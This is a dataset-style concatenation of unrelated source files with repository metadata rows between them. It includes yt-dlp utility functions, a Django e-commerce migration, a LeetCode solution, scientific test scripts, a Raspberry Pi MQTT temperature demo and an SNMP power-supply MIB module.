# http://en.wikipedia.org/wiki/NTFS#Alternate_data_streams_.28ADS.29
assert ':' not in key
assert os.path.exists(path)
ads_fn = path + ':' + key
try:
with open(ads_fn, 'wb') as f:
f.write(value)
except EnvironmentError as e:
raise XAttrMetadataError(e.errno, e.strerror)
else:
user_has_setfattr = check_executable('setfattr', ['--version'])
user_has_xattr = check_executable('xattr', ['-h'])
if user_has_setfattr or user_has_xattr:
value = value.decode('utf-8')
if user_has_setfattr:
executable = 'setfattr'
opts = ['-n', key, '-v', value]
elif user_has_xattr:
executable = 'xattr'
opts = ['-w', key, value]
cmd = ([encodeFilename(executable, True)]
+ [encodeArgument(o) for o in opts]
+ [encodeFilename(path, True)])
try:
p = subprocess.Popen(
cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
except EnvironmentError as e:
raise XAttrMetadataError(e.errno, e.strerror)
stdout, stderr = process_communicate_or_kill(p)
stderr = stderr.decode('utf-8', 'replace')
if p.returncode != 0:
raise XAttrMetadataError(p.returncode, stderr)
else:
# On Unix, and can't find pyxattr, setfattr, or xattr.
if sys.platform.startswith('linux'):
raise XAttrUnavailableError(
"Couldn't find a tool to set the xattrs. "
"Install either the python 'pyxattr' or 'xattr' "
"modules, or the GNU 'attr' package "
"(which contains the 'setfattr' tool).")
else:
raise XAttrUnavailableError(
"Couldn't find a tool to set the xattrs. "
"Install either the python 'xattr' module, "
"or the 'xattr' binary.")
def random_birthday(year_field, month_field, day_field):
start_date = datetime.date(1950, 1, 1)
end_date = datetime.date(1995, 12, 31)
offset = random.randint(0, (end_date - start_date).days)
random_date = start_date + datetime.timedelta(offset)
return {
year_field: str(random_date.year),
month_field: str(random_date.month),
day_field: str(random_date.day),
}
# Templates for internet shortcut files, which are plain text files.
DOT_URL_LINK_TEMPLATE = '''
[InternetShortcut]
URL=%(url)s
'''.lstrip()
DOT_WEBLOC_LINK_TEMPLATE = '''
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
\t<key>URL</key>
\t<string>%(url)s</string>
</dict>
</plist>
'''.lstrip()
DOT_DESKTOP_LINK_TEMPLATE = '''
[Desktop Entry]
Encoding=UTF-8
Name=%(filename)s
Type=Link
URL=%(url)s
Icon=text-html
'''.lstrip()
def iri_to_uri(iri):
"""
Converts an IRI (Internationalized Resource Identifier, allowing Unicode characters) to a URI (Uniform Resource Identifier, ASCII-only).
The function doesn't add an additional layer of escaping; e.g., it doesn't escape `%3C` as `%253C`. Instead, it percent-escapes characters with an underlying UTF-8 encoding *besides* those already escaped, leaving the URI intact.
"""
iri_parts = compat_urllib_parse_urlparse(iri)
if '[' in iri_parts.netloc:
raise ValueError('IPv6 URIs are not, yet, supported.')
# Querying `.netloc`, when there's only one bracket, also raises a ValueError.
# The `safe` argument values, that the following code uses, contain the characters that should not be percent-encoded. Everything else but letters, digits and '_.-' will be percent-encoded with an underlying UTF-8 encoding. Everything already percent-encoded will be left as is.
net_location = ''
if iri_parts.username:
net_location += compat_urllib_parse_quote(iri_parts.username, safe=r"!$%&'()*+,~")
if iri_parts.password is not None:
net_location += ':' + compat_urllib_parse_quote(iri_parts.password, safe=r"!$%&'()*+,~")
net_location += '@'
net_location += iri_parts.hostname.encode('idna').decode('utf-8') # Punycode for Unicode hostnames.
# The 'idna' encoding produces ASCII text.
if iri_parts.port is not None and iri_parts.port != 80:
net_location += ':' + str(iri_parts.port)
return compat_urllib_parse_urlunparse(
(iri_parts.scheme,
net_location,
compat_urllib_parse_quote_plus(iri_parts.path, safe=r"!$%&'()*+,/:;=@|~"),
# Unsure about the `safe` argument, since this is a legacy way of handling parameters.
compat_urllib_parse_quote_plus(iri_parts.params, safe=r"!$%&'()*+,/:;=@|~"),
# Not totally sure about the `safe` argument, since the source does not explicitly mention the query URI component.
compat_urllib_parse_quote_plus(iri_parts.query, safe=r"!$%&'()*+,/:;=?@{|}~"),
compat_urllib_parse_quote_plus(iri_parts.fragment, safe=r"!#$%&'()*+,/:;=?@{|}~")))
# Source for `safe` arguments: https://url.spec.whatwg.org/#percent-encoded-bytes.
def to_high_limit_path(path):
if sys.platform in ['win32', 'cygwin']:
# Work around MAX_PATH limitation on Windows. The maximum allowed length for the individual path segments may still be quite limited.
return r'\\?\ '.rstrip() + os.path.abspath(path)
return path
def format_field(obj, field, template='%s', ignore=(None, ''), default='', func=None):
val = obj.get(field, default)
if func and val not in ignore:
val = func(val)
return template % val if val not in ignore else default
def clean_podcast_url(url):
return re.sub(r'''(?x)
(?:
(?:
chtbl\.com/track|
media\.blubrry\.com| # https://create.blubrry.com/resources/podcast-media-download-statistics/getting-started/
play\.podtrac\.com
)/[^/]+|
(?:dts|www)\.podtrac\.com/(?:pts/)?redirect\.[0-9a-z]{3,4}| # http://analytics.podtrac.com/how-to-measure
flex\.acast\.com|
pd(?:
cn\.co| # https://podcorn.com/analytics-prefix/
st\.fm # https://podsights.com/docs/
)/e
)/''', '', url)
_HEX_TABLE = '0123456789abcdef'
def random_uuidv4():
return re.sub(r'[xy]', lambda x: _HEX_TABLE[random.randint(0, 15)], 'xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx')
def make_dir(path, to_screen=None):
try:
dn = os.path.dirname(path)
if dn and not os.path.exists(dn):
os.makedirs(dn)
return True
except (OSError, IOError) as err:
if callable(to_screen) is not None:
to_screen('unable to create directory ' + error_to_compat_str(err))
return False
def get_executable_path():
from zipimport import zipimporter
if hasattr(sys, 'frozen'): # Running from PyInstaller
path = os.path.dirname(sys.executable)
elif isinstance(globals().get('__loader__'), zipimporter): # Running from ZIP
path = os.path.join(os.path.dirname(__file__), '../..')
else:
path = os.path.join(os.path.dirname(__file__), '..')
return os.path.abspath(path)
def load_plugins(name, suffix, namespace):
plugin_info = [None]
classes = []
try:
plugin_info = imp.find_module(
name, [os.path.join(get_executable_path(), 'ytdlp_plugins')])
plugins = imp.load_module(name, *plugin_info)
for name in dir(plugins):
if name in namespace:
continue
if not name.endswith(suffix):
continue
klass = getattr(plugins, name)
classes.append(klass)
namespace[name] = klass
except ImportError:
pass
finally:
if plugin_info[0] is not None:
plugin_info[0].close()
return classes
def traverse_obj(
obj, *key_list, default=None, expected_type=None,
casesense=True, is_user_input=False, traverse_string=False):
''' Traverse nested list/dict/tuple
@param default Default value to return
@param expected_type Only accept final value of this type
@param casesense Whether to consider dictionary keys as case sensitive
@param is_user_input Whether the keys are generated from user input. If True,
strings are converted to int/slice if necessary
@param traverse_string Whether to traverse inside strings. If True, any
non-compatible object will also be converted into a string
'''
if not casesense:
_lower = lambda k: k.lower() if isinstance(k, str) else k
key_list = ((_lower(k) for k in keys) for keys in key_list)
def _traverse_obj(obj, keys):
for key in list(keys):
if isinstance(obj, dict):
obj = (obj.get(key) if casesense or (key in obj)
else next((v for k, v in obj.items() if _lower(k) == key), None))
else:
if is_user_input:
key = (int_or_none(key) if ':' not in key
else slice(*map(int_or_none, key.split(':'))))
if not isinstance(key, (int, slice)):
return None
if not isinstance(obj, (list, tuple)):
if not traverse_string:
return None
obj = str(obj)
try:
obj = obj[key]
except IndexError:
return None
return obj
for keys in key_list:
val = _traverse_obj(obj, keys)
if val is not None:
if expected_type is None or isinstance(val, expected_type):
return val
return default
def traverse_dict(dictn, keys, casesense=True):
''' For backward compatibility. Do not use '''
return traverse_obj(dictn, keys, casesense=casesense,
is_user_input=True, traverse_string=True)
def variadic(x, allowed_types=str):
return x if isinstance(x, collections.Iterable) and not isinstance(x, allowed_types) else (x,)
| 29.990127 | 282 | 0.518456 |
795c567ca08b4801dbbeefb3cae034edd19fb119 | 3,406 | py | Python | app/migrations/0001_initial.py | rahulraj6000/E-commerce | 383776d7a1ffbfe3aa0e75d7f2a59c96c95756b4 | [
"MIT"
] | null | null | null | app/migrations/0001_initial.py | rahulraj6000/E-commerce | 383776d7a1ffbfe3aa0e75d7f2a59c96c95756b4 | [
"MIT"
] | null | null | null | app/migrations/0001_initial.py | rahulraj6000/E-commerce | 383776d7a1ffbfe3aa0e75d7f2a59c96c95756b4 | [
"MIT"
] | null | null | null | # Generated by Django 3.1.5 on 2021-06-29 05:35
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Customer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('locality', models.IntegerField()),
('city', models.CharField(max_length=50)),
('zipcode', models.IntegerField()),
('state', models.CharField(choices=[('Andaman & Nicobar Island ', 'Andaman & Nicobar Islands'), ('Andhra Pradesh', 'Andhra Pradesh'), ('Arunachal Pradesh', 'Arunachal Pradesh'), ('Assam', 'Assam'), ('Bihar', 'Bihar'), ('Chandigarh', 'Chandigarh'), ('Chhattisgarh', 'Chhattisgarh')], max_length=50)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100)),
('selling_price', models.FloatField()),
('discounted_price', models.FloatField()),
('description', models.TextField()),
('brand', models.CharField(max_length=100)),
('category', models.CharField(choices=[('M', 'Mobile'), ('L', 'Laptop'), ('TW', 'Top Wear'), ('BW', 'Bottom Wear')], max_length=2)),
('product_image', models.ImageField(upload_to='productimg')),
],
),
migrations.CreateModel(
name='OrderPlaced',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('quantity', models.PositiveIntegerField(default=1)),
('ordered_date', models.DateField(auto_now_add=True)),
('status', models.CharField(choices=[('Accepted', 'Accepted'), ('Packed', 'Packed'), ('On The Way', 'On The Way'), ('Delivered', 'Delivered'), ('Cancel', 'Cancel')], default='Pending', max_length=50)),
('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.customer')),
('product', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.product')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Cart',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('quantity', models.PositiveIntegerField(default=1)),
('product', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.product')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| 53.21875 | 315 | 0.592777 |
795c5748dbbb5ccb628e757c4e0222014859de33 | 754 | py | Python | 1423. Maximum Points You Can Obtain from Cards/solution1.py | sunshot/LeetCode | 8f6503201831055f1d49ed3abb25be44a13ec317 | [
"MIT"
] | null | null | null | 1423. Maximum Points You Can Obtain from Cards/solution1.py | sunshot/LeetCode | 8f6503201831055f1d49ed3abb25be44a13ec317 | [
"MIT"
] | null | null | null | 1423. Maximum Points You Can Obtain from Cards/solution1.py | sunshot/LeetCode | 8f6503201831055f1d49ed3abb25be44a13ec317 | [
"MIT"
] | null | null | null | from typing import List
class Solution:
def maxScore(self, cardPoints: List[int], k: int) -> int:
total = sum(cardPoints)
k = len(cardPoints) - k
if k == 0:
return total
# Now we transfer the problem to k sliding window, return the min sum
ans = sum(cardPoints[0:k])
curr_sum = ans
left = 0
for right in range(k, len(cardPoints)):
curr_sum = curr_sum + cardPoints[right] - cardPoints[left]
ans = min(ans, curr_sum)
left += 1
return total - ans
if __name__== '__main__':
solution = Solution()
cardPoints = [100,40,17,9,73,75]
k = 3
ans = solution.maxScore(cardPoints, k)
print(ans == 248)
| 30.16 | 77 | 0.55305 |
795c57e4813ed3173b8c2d7c2c8f42550fdc7e8f | 5,270 | py | Python | tests/test_mpcdata.py | matthewjohnpayne/MPCData | bf5cc4b846437928d3c7e4bfb8d809f8bf9f9dc4 | [
"MIT"
] | null | null | null | tests/test_mpcdata.py | matthewjohnpayne/MPCData | bf5cc4b846437928d3c7e4bfb8d809f8bf9f9dc4 | [
"MIT"
] | null | null | null | tests/test_mpcdata.py | matthewjohnpayne/MPCData | bf5cc4b846437928d3c7e4bfb8d809f8bf9f9dc4 | [
"MIT"
] | null | null | null | # mpcformat/tests/test_mpcdata.py
# import pytest
# Third-party imports
import json
import os
# Import other required local modules/functions
import mpcdata.params as params
# Import the specific package/module/function we are testing
import mpcdata.mpcdata as mpcdata
'''
def test_MPCMasterFile():
"""
Want to see the successful return of a masterDict from an MPCMasterFile object
... both when a local master-file already exists and when it doesn't
"""
for master_type in ['external']:#, 'internal']:
# Forcibly delete any local master-file ('external_master_list.txt')
filepath = params.fileDict[master_type]
try:
os.remove(filepath)
except OSError:
pass
assert not os.path.exists(filepath)
# Running open_master_list should
# (i) generate a filepath
# (ii) download a masterDict & save-it to disk
MPCMF = mpcdata.MPCMasterFile(master_type)
filepath = MPCMF.filepath
masterDict = MPCMF.masterDict
assert os.path.exists(filepath)
assert 'leap-seconds' in masterDict
# Running open_master_list again should just cause a fileread (no download)
modtimeBefore = os.path.getmtime(filepath)
MPCMF = mpcdata.MPCMasterFile(master_type)
filepath = MPCMF.filepath
masterDict = MPCMF.masterDict
modtimeAfter = os.path.getmtime(filepath)
assert modtimeAfter == modtimeBefore
assert 'leap-seconds' in masterDict
def test_MPCMasterFile_for_nonexistant_type():
"""
Want to check what happens when a nonexistant master-list-type is passed
This test prob won't work due to poor exception handling
"""
master_type = 'ThisStringShouldNotWork'
try:
MPCMF = mpcdata.MPCMasterFile(master_type)
passed = True
except:
passed = False
assert not passed
'''
def test_MPCFile_external():
"""
Want to see the successful return of a filepath & filecontents from MPCFile object
... both when the local file already exists and when it doesn't
This is for some EXTERNAL (i.e. non-MPC) file
"""
filename = 'leap-seconds.list'
master_type ='external'
expectedfilepath = os.path.join(params.dirDict[master_type],filename)
# Forcibly delete any local data file
try:
os.remove(expectedfilepath)
except OSError:
pass
assert not os.path.exists(expectedfilepath)
# Initiating an MPCFile object should allow access to filepath variable
MPCF = mpcdata.MPCFile(filename)
filepath = MPCF.filename
assert filepath == expectedfilepath
'''
# Because of the above deletes and that we did NOT download, we expect filepath to still NOT exist
assert not os.path.exists(filepath)
# Calling get_filedata() method should cause the file to come into existence
filedata = MPCF.get_filedata()
assert os.path.exists(filepath)
assert filedata == MPCF.filedata
# The 'leap-seconds.txt' file is expected to contain the string '2272060800' at some point
IN = False
for item in filedata:
if '2272060800' in item:
IN = True
assert IN
# Running MPCF.get_filedata() again should just cause a fileread (no download)
modtimeBefore = os.path.getmtime(expectedfilepath)
MPCF = mpcdata.MPCFile(filename)
filedata = MPCF.get_filedata()
modtimeAfter = os.path.getmtime(expectedfilepath)
assert modtimeAfter == modtimeBefore
assert 'leap-seconds' in masterDict
'''
'''
def test_MPCFile_internal():
"""
Want to see the successful return of a filepath & filecontents from MPCFile object
... both when the local file already exists and when it doesn't
This is for some INTERNAL file (i.e. from MPC website)
"""
filename = '?????.txt'
master_type ='internal'
expectedfilepath = os.path.join(params.dirDict[master_type],filename)
# Forcibly delete any local file
try:
os.remove(expectedfilepath)
except OSError:
pass
assert not os.path.exists(expectedfilepath)
# Initiating an MPCFile object should allow access to filepath variable
MPCF = mpcdata.MPCFile(filename)
filepath = MPCF.filename
assert filepath == expectedfilepath
# Because of the above deletes and that we did NOT download, we expect filepath to still NOT exist
assert not os.path.exists(filepath)
# Calling get_filedata() method should cause the file to come into existence
filedata = MPCF.get_filedata()
assert os.path.exists(filepath)
assert filedata == MPCF.filedata
# The 'leap-seconds.txt' file is expected to contain the string '2272060800' at some point
IN = False ; for item in filecontents: if '2272060800' in item: IN = True
assert IN
# Running MPCF.get_filedata() again should just cause a fileread (no download)
modtimeBefore = os.path.getmtime(expectedfilepath)
MPCF = mpcdata.MPCFile(filename)
filedata = MPCF.get_filedata()
modtimeAfter = os.path.getmtime(expectedfilepath)
assert modtimeAfter == modtimeBefore
assert 'leap-seconds' in masterDict
'''
| 32.530864 | 102 | 0.681214 |
795c59f2f9d584f1a8e618f6d2abc9aa870b8914 | 368 | py | Python | tests/basics/testAssemblePerf.py | mjziebarth/gimli | 196ac4d6dd67e0326cccc44a87b367f64051e490 | [
"Apache-2.0"
] | 3 | 2021-07-10T00:56:59.000Z | 2022-02-17T12:43:38.000Z | tests/basics/testAssemblePerf.py | ivek1312/gimli | 5fafebb7c96dd0e04e2616df402fa27a01609d63 | [
"Apache-2.0"
] | null | null | null | tests/basics/testAssemblePerf.py | ivek1312/gimli | 5fafebb7c96dd0e04e2616df402fa27a01609d63 | [
"Apache-2.0"
] | 1 | 2022-03-29T04:28:40.000Z | 2022-03-29T04:28:40.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
pygimli integration function
"""
import pygimli as pg
import numpy as np
def test(N):
x = np.linspace(0, 1, N)
pg.tic()
mesh = pg.createGrid(x, x, x)
print(mesh)
pg.toc()
A = pg.RSparseMatrix()
A.fillStiffnessMatrix(mesh)
pg.toc()
test(20)
#for N in range(10, 1000, 100):
| 14.72 | 33 | 0.581522 |
795c5a1e4a99f841453046ff6c081a6953bc584e | 4,449 | py | Python | mqtt/mqtt_subscribe.py | TwilioDevEd/raspberry-pi-prog-wireless-demos | 88b7489038d5fe9750ce19ecfa013a080efa3aa4 | [
"MIT"
] | null | null | null | mqtt/mqtt_subscribe.py | TwilioDevEd/raspberry-pi-prog-wireless-demos | 88b7489038d5fe9750ce19ecfa013a080efa3aa4 | [
"MIT"
] | null | null | null | mqtt/mqtt_subscribe.py | TwilioDevEd/raspberry-pi-prog-wireless-demos | 88b7489038d5fe9750ce19ecfa013a080efa3aa4 | [
"MIT"
] | null | null | null | ##############################################
# Twilio MQTT Demo for Programmable Wireless #
##############################################
from time import sleep
from sys import exit
from smbus import SMBus
import json
import paho.mqtt.client as mqtt
##############################################
# Global variables #
##############################################
# EDIT THESE
MQTT_CLIENT_ID = "SOME_RANDOM_STRING"
MQTT_PUBLISH_TOPIC = "SOME_RANDOM_STRING/info"
MQTT_SUBSCRIBE_TOPIC = "SOME_RANDOM_STRING/state"
MQTT_ADDRESS = "broker.hivemq.com"
MQTT_BROKER_PORT = 1883
MQTT_USERNAME = "YOUR_USERNAME"
MQTT_PASSWORD = "YOUR_PASSWORD"
UNITS = "celsius"
##############################################
# MCP9808 driver #
##############################################
MCP9808_I2CADDR_DEFAULT = 0x18
MCP9808_REG_CONFIG = 0x01
MCP9808_REG_AMBIENT_TEMP = 0x05
MCP9808_REG_MANUF_ID = 0x06
MCP9808_REG_DEVICE_ID = 0x07
class MCP9808(object):
def __init__(self, address=MCP9808_I2CADDR_DEFAULT, bus=None):
self.address = address
if bus: self.bus = SMBus(bus)
def check(self):
# Check we can read correct Manufacturer ID and Device ID values
try:
mid_data = self.bus.read_i2c_block_data(self.address, MCP9808_REG_MANUF_ID, 2)
did_data = self.bus.read_i2c_block_data(self.address, MCP9808_REG_DEVICE_ID, 2)
mid_value = (mid_data[0] << 8) | mid_data[1]
did_value = (did_data[0] << 8) | did_data[1]
return (mid_value == 0x0054 and did_value == 0x0400)
except:
return False
def read(self):
# Get the ambient temperature
temp_data = self.bus.read_i2c_block_data(self.address, MCP9808_REG_AMBIENT_TEMP, 2)
# Scale and convert to signed Celsius value.
temp_raw = (temp_data[0] << 8) | temp_data[1]
temp_cel = (temp_raw & 0x0FFF) / 16.0
if temp_raw & 0x1000: temp_cel -= 256.0
return temp_cel
##############################################
# The main application code #
##############################################
def on_message(client, userdata, message):
global UNITS
print("Message received ", str(message.payload.decode("utf-8")))
try:
msg = json.loads(str(message.payload.decode("utf-8")))
if "units" in msg and msg["units"] in ("fahrenheit", "celsius"):
if UNITS != msg["units"]:
print("Changing logged units from",UNITS,"to",msg["units"])
UNITS = msg["units"]
except:
# Message probably wasn't JSON
pass
def app_loop():
global UNITS
tx_count = 1
try:
# Setup the temperature sensor
sensor = MCP9808(bus=1)
sensor_state = sensor.check()
if sensor_state is False:
print("[ERROR] No MCP9808 attached")
exit(1)
# Main application loop
while True:
temp = sensor.read()
if UNITS != "celsius": temp = (temp * 9 / 5) + 32;
print("{}. Ambient temperature is {:.02f} {}".format(tx_count, temp, UNITS))
tx_count +=1
# Craft a message to the cloud
msg_formatted = json.dumps({
"device_id": MQTT_CLIENT_ID + "-device",
"temperature": temp,
"units": UNITS,
"shenanigans": "none"
})
# Publish the message by MQTT
client.publish(MQTT_PUBLISH_TOPIC, msg_formatted)
# Loop every minute
sleep(60)
except KeyboardInterrupt:
print(" MQTT Demo 2 for Programmable Wireless stopped")
except OSError:
print("[ERROR] Cannot read sensor, check connection")
##############################################
# Called from the command line #
##############################################
if __name__ == '__main__':
print ("Starting MQTT Demo 2 for Programmable Wireless")
# Setup MQTT
client = mqtt.Client("TWILIO DEMO 2")
client.username_pw_set(MQTT_USERNAME, password=MQTT_PASSWORD)
client.connect(MQTT_ADDRESS, MQTT_BROKER_PORT, 60)
client.loop_start()
# Set a target function to process messages from the broker
# and subscribe to on-topic messages
client.on_message = on_message
client.subscribe(MQTT_SUBSCRIBE_TOPIC)
# Run the main loop
app_loop()
| 33.704545 | 91 | 0.557204 |
795c5b1d796295ec18835a39cd09dd7784e3fc93 | 3,745 | py | Python | tests/wph_quijote/wph_syntheses/sufficient_stat.py | Eralys/pywph_dev | bb864050c73b168c32a59f37ac0aca71ff159aed | [
"BSD-3-Clause"
] | 3 | 2021-04-05T12:24:03.000Z | 2022-02-14T22:15:03.000Z | tests/wph_quijote/wph_syntheses/sufficient_stat.py | Eralys/pywph_dev | bb864050c73b168c32a59f37ac0aca71ff159aed | [
"BSD-3-Clause"
] | null | null | null | tests/wph_quijote/wph_syntheses/sufficient_stat.py | Eralys/pywph_dev | bb864050c73b168c32a59f37ac0aca71ff159aed | [
"BSD-3-Clause"
] | 1 | 2022-02-03T16:44:35.000Z | 2022-02-03T16:44:35.000Z | import torch
from .utils import periodic_dis
def compute_idx_of_sufficient_stat(L, J, dj, dl, dn):
L2 = L * 2
idx_j1, idx_j2, idx_k1, idx_k2, idx_ell2, idx_dn1, idx_dn2 = [], [], [], [], [], [], []
idx_lists = (idx_j1, idx_j2, idx_k1, idx_k2, idx_ell2, idx_dn1, idx_dn2)
# j1=j2, k1=0,1, k2=0 or 1
for j1 in range(J):
add_k_and_j_and_dn_for_all_ell_in_idx_list(idx_lists, L2, 0, j1, j1, 0, 1, 0, 0)
add_k_and_j_and_dn_for_all_ell_in_idx_list(idx_lists, L2, 0, j1, j1, 1, 1, 0, 0)
add_k_and_j_and_dn_for_all_ell_in_idx_list(idx_lists, L2, 0, j1, j1, 0, 0, 0, 0)
if j1 == J - 1:
max_dn = 0
elif j1 == J - 2:
max_dn = min(1, dn)
else:
max_dn = dn
for n in range(4*max_dn):
add_k_and_j_and_dn_for_all_ell_in_idx_list(idx_lists, L2, 0, j1, j1, 1, 1, 0, (n+1))
add_k_and_j_and_dn_for_all_ell_in_idx_list(idx_lists, L2, 0, j1, j1, 0, 0, 0, (n+1))
# k1 = 0,1
# k2 = 0,1 or 2**(j2-j1)
# k2 > k1
# j1+1 <= j2 <= min(j1+dj,J-1)
for j1 in range(J):
for j2 in range(j1 + 1, min(j1 + dj + 1, J)):
if j2 == J - 1:
max_dn = 0
elif j2 == J - 2:
max_dn = min(1, dn)
else:
max_dn = dn
for n in range(4 * max_dn):
add_k_and_j_and_dn_for_all_ell_in_idx_list(idx_lists, L2, 0, j1, j2, 1, 2 ** (j2 - j1), 0, (n+1))
add_k_and_j_and_dn_for_all_ell_in_idx_list(idx_lists, L2, 0, j1, j2, 0, 1, 0, (n + 1))
add_k_and_j_and_dn_for_all_ell_in_idx_list(idx_lists, L2, 0, j1, j2, 1, 2**(j2-j1), 0, 0)
add_k_and_j_and_dn_for_all_ell_in_idx_list(idx_lists, L2, dl, j1, j2, 0, 1, 0, 0)
print("Total number of coefficient: " + str(len(idx_k2)))
return get_idx_wph(idx_j1, idx_j2, idx_k1, idx_k2, idx_ell2, idx_dn1, idx_dn2)
def compute_idx_of_sufficient_stat_PS(L, J, dj, dl, dn):
L2 = L * 2
idx_j1, idx_j2, idx_k1, idx_k2, idx_ell2, idx_dn1, idx_dn2 = [], [], [], [], [], [], []
idx_lists = (idx_j1, idx_j2, idx_k1, idx_k2, idx_ell2, idx_dn1, idx_dn2)
# j1=j2, k1=1, k2=1
for j1 in range(J):
add_k_and_j_and_dn_for_all_ell_in_idx_list(idx_lists, L2, 0, j1, j1, 1, 1, 0, 0)
if j1 == J - 1:
max_dn = 0
elif j1 == J - 2:
max_dn = min(1, dn)
else:
max_dn = dn
for n in range(4*max_dn):
add_k_and_j_and_dn_for_all_ell_in_idx_list(idx_lists, L2, 0, j1, j1, 1, 1, 0, (n+1))
print("Total number of coefficient: " + str(len(idx_k2)))
return get_idx_wph(idx_j1, idx_j2, idx_k1, idx_k2, idx_ell2, idx_dn1, idx_dn2)
def add_k_and_j_and_dn_for_all_ell_in_idx_list(idx_lists, L2, dl, j1, j2, k1, k2, dn1, dn2):
idx_j1, idx_j2, idx_k1, idx_k2, idx_ell2, idx_dn1, idx_dn2 = idx_lists
for ell2 in range(L2):
#for ell2 in range(0,L2,2):
if periodic_dis(0, ell2, L2) <= dl:
idx_j1.append(j1)
idx_j2.append(j2)
idx_k1.append(k1)
idx_k2.append(k2)
idx_ell2.append(ell2)
idx_dn1.append(dn1)
idx_dn2.append(dn2)
def get_idx_wph(idx_j1, idx_j2, idx_k1, idx_k2, idx_ell2, idx_dn1, idx_dn2):
idx_wph = dict()
idx_wph['j1'] = torch.tensor(idx_j1).type(torch.long)
idx_wph['k1'] = torch.tensor(idx_k1).type(torch.long)
idx_wph['ell2'] = torch.tensor(idx_ell2).type(torch.long)
idx_wph['j2'] = torch.tensor(idx_j2).type(torch.long)
idx_wph['k2'] = torch.tensor(idx_k2).type(torch.long)
idx_wph['dn1'] = torch.tensor(idx_dn1).type(torch.long)
idx_wph['dn2'] = torch.tensor(idx_dn2).type(torch.long)
return idx_wph
| 39.421053 | 113 | 0.587717 |
795c5bb039808095c69d00d7c52105da832a37d2 | 21,077 | py | Python | pysnmp/POWERSUPPLY-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 11 | 2021-02-02T16:27:16.000Z | 2021-08-31T06:22:49.000Z | pysnmp/POWERSUPPLY-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 75 | 2021-02-24T17:30:31.000Z | 2021-12-08T00:01:18.000Z | pysnmp/POWERSUPPLY-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module POWERSUPPLY-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/POWERSUPPLY-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 20:32:54 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsIntersection, ValueRangeConstraint, ValueSizeConstraint, ConstraintsUnion, SingleValueConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsIntersection", "ValueRangeConstraint", "ValueSizeConstraint", "ConstraintsUnion", "SingleValueConstraint")
entPhysicalIndex, = mibBuilder.importSymbols("ENTITY-MIB", "entPhysicalIndex")
hpSwitch, = mibBuilder.importSymbols("HP-ICF-OID", "hpSwitch")
SnmpAdminString, = mibBuilder.importSymbols("SNMP-FRAMEWORK-MIB", "SnmpAdminString")
ModuleCompliance, NotificationGroup, ObjectGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup", "ObjectGroup")
Bits, IpAddress, Counter64, Counter32, NotificationType, ObjectIdentity, iso, MibScalar, MibTable, MibTableRow, MibTableColumn, ModuleIdentity, MibIdentifier, TimeTicks, Unsigned32, Integer32, Gauge32 = mibBuilder.importSymbols("SNMPv2-SMI", "Bits", "IpAddress", "Counter64", "Counter32", "NotificationType", "ObjectIdentity", "iso", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "ModuleIdentity", "MibIdentifier", "TimeTicks", "Unsigned32", "Integer32", "Gauge32")
TruthValue, TextualConvention, MacAddress, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TruthValue", "TextualConvention", "MacAddress", "DisplayString")
hpicfPsMIB = ModuleIdentity((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55))
hpicfPsMIB.setRevisions(('2013-08-20 00:00', '2013-06-13 00:00', '2013-03-07 10:00', '2008-08-27 10:00',))
if mibBuilder.loadTexts: hpicfPsMIB.setLastUpdated('201308200000Z')
if mibBuilder.loadTexts: hpicfPsMIB.setOrganization('HP Networking')
hpicfEntityPs = MibIdentifier((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1))
class HpicfDcPsIndex(TextualConvention, Unsigned32):
status = 'current'
displayHint = 'd'
class HpicfDcPsState(TextualConvention, Integer32):
status = 'current'
